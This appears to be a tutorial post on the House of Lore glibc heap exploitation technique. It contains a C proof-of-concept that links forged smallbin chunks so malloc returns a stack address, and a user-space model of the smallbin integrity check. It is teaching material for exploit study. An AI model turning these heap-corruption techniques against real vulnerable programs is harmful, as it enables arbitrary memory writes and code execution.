Looking at the principle, there is not much to it: the idea is the same as House of Spirit. The difference is that House of Spirit forges a fake chunk in the fastbin size range, while House of Lore targets chunks of small bin and large bin size. The large bin variant later became unusable because protections were added to the large bin code.
Compared with House of Spirit, House of Lore is a little more troublesome, because the smallbin path has more checks, so most of the preparation is there to get past them. The check that matters is in the smallbin branch of `_int_malloc`: after taking `victim = bin->bk` it verifies `victim->bk->fd == victim` and otherwise aborts with "malloc(): smallbin double linked list corrupted". Every chunk the attacker links into the bin, the real one and each fake one, has to satisfy that relation, which is why the fake chunk needs a second fake chunk behind it.
```c
#include <stdio.h>
#include <stdlib.h>

// Chunk layout used by the demo (the struct definition was not reproduced
// on the page; this is the usual one with a 0x64-byte payload).
// sizeof(struct small_chunk) == 0x84, so malloc(len) yields a 0x90 chunk:
// smallbin-sized, but on glibc >= 2.26 also tcache-sized, so this demo
// assumes glibc < 2.26 (or that the 0x90 tcache bin is filled beforehand,
// otherwise free(ptr) never reaches the unsorted bin).
struct small_chunk {
    size_t prev_size;
    size_t size;
    struct small_chunk *fd;
    struct small_chunk *bk;
    char buf[0x64];
};

int main(void) {
    struct small_chunk fake_chunk;         // At address 0x7ffdeb37d050
    struct small_chunk another_fake_chunk;
    struct small_chunk *real_chunk;
    unsigned long long *ptr, *victim;
    int len;

    len = sizeof(struct small_chunk);

    // Grab two small chunks and free the first one
    // This chunk will go into unsorted bin
    ptr = malloc(len);                     // points to address 0x1a44010

    // The second malloc can be of random size. We just want that
    // the first chunk does not merge with the top chunk on freeing
    malloc(len);                           // points to address 0x1a440a0

    // The chunk header sits 0x10 bytes before the user pointer
    // (this assignment was missing from the listing on the page)
    real_chunk = (struct small_chunk *)(ptr - 2);

    // This chunk will end up in unsorted bin
    free(ptr);

    // Grab another chunk with greater size so as to prevent getting back
    // the same one. Also, the previous chunk will now go from unsorted to
    // small bin
    malloc(len + 0x10);                    // points to address 0x1a44130

    // Make the real small chunk's bk pointer point to &fake_chunk
    // This will insert the fake chunk in the smallbin
    real_chunk->bk = &fake_chunk;
    // and fake_chunk's fd point to the small chunk
    // This will ensure that 'victim->bk->fd == victim' for the real chunk
    fake_chunk.fd = real_chunk;

    // We also need this 'victim->bk->fd == victim' test to pass for fake chunk
    fake_chunk.bk = &another_fake_chunk;
    another_fake_chunk.fd = &fake_chunk;

    // Remove the real chunk by a standard call to malloc
    malloc(len);                           // points at address 0x1a44010

    // Next malloc for that size will return the fake chunk
    victim = malloc(len);                  // points at address 0x7ffdeb37d060
    printf("victim = %p, &fake_chunk.fd = %p\n",
           (void *)victim, (void *)&fake_chunk.fd);
    return 0;
}
```
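To see exactly which pointer writes the technique depends on, without needing an old glibc, here is an added example (not part of the original post) that models the smallbin take path of `_int_malloc` in user space: a circular bin header, the `victim->bk->fd == victim` check, and the unlink. `house_of_lore_model` stages the same link-up as the demo above and reports how far the two allocations get when one of the two fd writes is left out. The `struct chunk` and the bin helpers are a simplified model, not glibc's code.

```c
#include <stddef.h>

/* Simplified chunk header: same first four fields as glibc's malloc_chunk. */
struct chunk {
    size_t prev_size;
    size_t size;
    struct chunk *fd;
    struct chunk *bk;
};

/* An empty smallbin is a header whose fd and bk point at itself. */
static void bin_init(struct chunk *bin) {
    bin->fd = bin;
    bin->bk = bin;
}

/* Insert at the head of the bin, as sorting from the unsorted bin does. */
static void bin_insert(struct chunk *bin, struct chunk *c) {
    c->fd = bin->fd;
    c->bk = bin;
    bin->fd->bk = c;
    bin->fd = c;
}

/* Model of the smallbin branch of _int_malloc: take the last chunk,
 * verify victim->bk->fd == victim, then unlink it.  Returns NULL where
 * glibc would abort with "malloc(): smallbin double linked list corrupted"
 * (and also for an empty bin, which glibc would simply skip). */
static struct chunk *smallbin_take(struct chunk *bin) {
    struct chunk *victim = bin->bk;
    if (victim == bin)
        return NULL;                 /* empty bin */
    struct chunk *bck = victim->bk;
    if (bck->fd != victim)
        return NULL;                 /* integrity check fails */
    bin->bk = bck;
    bck->fd = bin;
    return victim;
}

/* Stage the House of Lore link-up against the model bin.  wire_fd and
 * wire_bk toggle the two fd writes the technique relies on.  Returns:
 *   0: the real chunk is refused (real->bk->fd != real)
 *   1: the real chunk is returned but the fake chunk is refused
 *   2: both are taken: the second allocation returns the fake chunk */
int house_of_lore_model(int wire_fd, int wire_bk) {
    struct chunk bin, real_chunk, fake_chunk = {0}, another_fake_chunk = {0};
    bin_init(&bin);
    bin_insert(&bin, &real_chunk);          /* freed chunk sorted into smallbin */

    real_chunk.bk = &fake_chunk;            /* the attacker's bk overwrite */
    if (wire_fd)
        fake_chunk.fd = &real_chunk;        /* real->bk->fd == real */
    fake_chunk.bk = &another_fake_chunk;
    if (wire_bk)
        another_fake_chunk.fd = &fake_chunk; /* fake->bk->fd == fake */

    if (smallbin_take(&bin) != &real_chunk)
        return 0;
    if (smallbin_take(&bin) != &fake_chunk)
        return 1;
    return 2;
}
```

With both writes in place the second take hands out the fake chunk; dropping `fake_chunk.fd = &real_chunk` makes even the real chunk fail the check, and dropping `another_fake_chunk.fd = &fake_chunk` lets the real chunk out but stops at the fake one. That is the whole reason the demo needs `another_fake_chunk`: the fake chunk must itself look like a properly linked bin member when it becomes `victim`.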